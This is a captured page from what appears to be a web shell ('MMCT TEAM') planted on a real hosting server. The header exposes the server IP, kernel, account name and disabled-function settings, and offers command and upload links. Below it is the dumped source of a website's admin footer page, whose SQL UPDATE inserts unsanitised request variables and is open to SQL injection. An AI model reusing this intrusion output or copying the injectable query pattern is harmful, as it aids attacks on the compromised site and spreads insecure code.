MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.133.152.26
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/ppcad7no/sainicraneservice.in/wknadmin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/sainicraneservice.in/wknadmin/manage_footer.php
<?php
require_once("../includes/dbsmain.inc.php");
if(is_post_back()){
 if(isset($_REQUEST['Update'])){	
     $update="update tbl_admin set 
	             admin_copyright='$admin_copyright',
				 admin_member_of='$admin_member_of',
				 admin_keyword='$admin_keyword',
				 admin_keyword_link='$admin_keyword_link',
				 admin_all_right_reserved='$admin_all_right_reserved' 
				 where 1 and admin_user_type='Admin'";
	db_query($update);
    $arr_error_msgs[] = "Record Updated";	
 }	
}
?>
<link href="styles.css" rel="stylesheet" type="text/css">
<?php include("top.inc.php");?>
            <table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td id="pageHead"><div id="txtPageHead"> Manage Footer </div></td>
              </tr>
            </table>
            <b>
            <? include("error_msgs.inc.php");?>
            </b>
            <table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td id="content"><form name="form1" method="post" enctype="multipart/form-data">
                    <table width="70%"  border="0" cellpadding="0" align="center" cellspacing="1" class="tableList" style="border:1px outset #fff;">
                      <tr>
                        <th nowrap="nowrap">&nbsp;</th>
                        <th width="61%" nowrap="nowrap"></th>
                      </tr>
                      <?php
$sql = "select * from tbl_admin where 1 and admin_user_type='Admin'";
$sqlupdt=db_query($sql);		  
while ($line_raw = mysql_fetch_array($sqlupdt)) {
	@extract($line_raw);
	$css = ($css=='trOdd')?'trEven':'trOdd';
?>
                      <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap" style="font-size:11px; font-weight:bold; color:#003A75;">Copyright</td>
                        <td nowrap="nowrap"><input type="text" name="admin_copyright" id="admin_copyright" value="<?=$admin_copyright?>" style="width:300px; height:25px; padding-left:5px; font-size:11px;" /></td>
                      </tr>
                      <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap" style="font-size:11px; font-weight:bold; color:#003A75;"> All Rights Reserved By </td>
                        <td nowrap="nowrap"><input type="text" name="admin_all_right_reserved" id="admin_all_right_reserved" value="<?=$admin_all_right_reserved?>" style="width:300px; height:25px; padding-left:5px; font-size:11px;" /></td>
                      </tr>
					  <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap" style="font-size:11px; font-weight:bold; color:#003A75;"> Member of </td>
                        <td nowrap="nowrap"><input type="text" name="admin_member_of" id="admin_member_of" value="<?=$admin_member_of?>" style="width:300px; height:25px; padding-left:5px; font-size:11px;" /></td>
                      </tr>
					  <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap" style="font-size:11px; font-weight:bold; color:#003A75;"> Keyword </td>
                        <td nowrap="nowrap"><input type="text" name="admin_keyword" id="admin_keyword" value="<?=$admin_keyword?>" style="width:300px; height:25px; padding-left:5px; font-size:11px;" /></td>
                      </tr>
					  <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap" style="font-size:11px; font-weight:bold; color:#003A75;"> Keyword Link </td>
                        <td nowrap="nowrap"><input type="text" name="admin_keyword_link" id="admin_keyword_link" value="<?=$admin_keyword_link?>" style="width:300px; height:25px; padding-left:5px; font-size:11px;" /><br />
<b style="font-size:10px; color:#F00;">[ http://www.tradekeyindia.com ]</b></td>
                      </tr>
                      <tr class="<?=$css?>" align="center">
                        <td nowrap="nowrap">&nbsp;</td>
                        <td nowrap="nowrap"><input type="submit" name="Update" value="Update" class="button" style="font-size:13px; font-weight:bold; height:27px; background-color:#006BD7; border-radius:4px; cursor:pointer; width:100px; margin-bottom:15px; margin-top:7px;" /></td>
                      </tr>
                      <? } ?>
                    </table>
                    <table width="100%" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                        <td align="right" style="padding:2px"></td>
                      </tr>
                    </table>
                  </form></td>
              </tr>
            </table>
<?php include("bottom.inc.php");?>

MMCT - 2023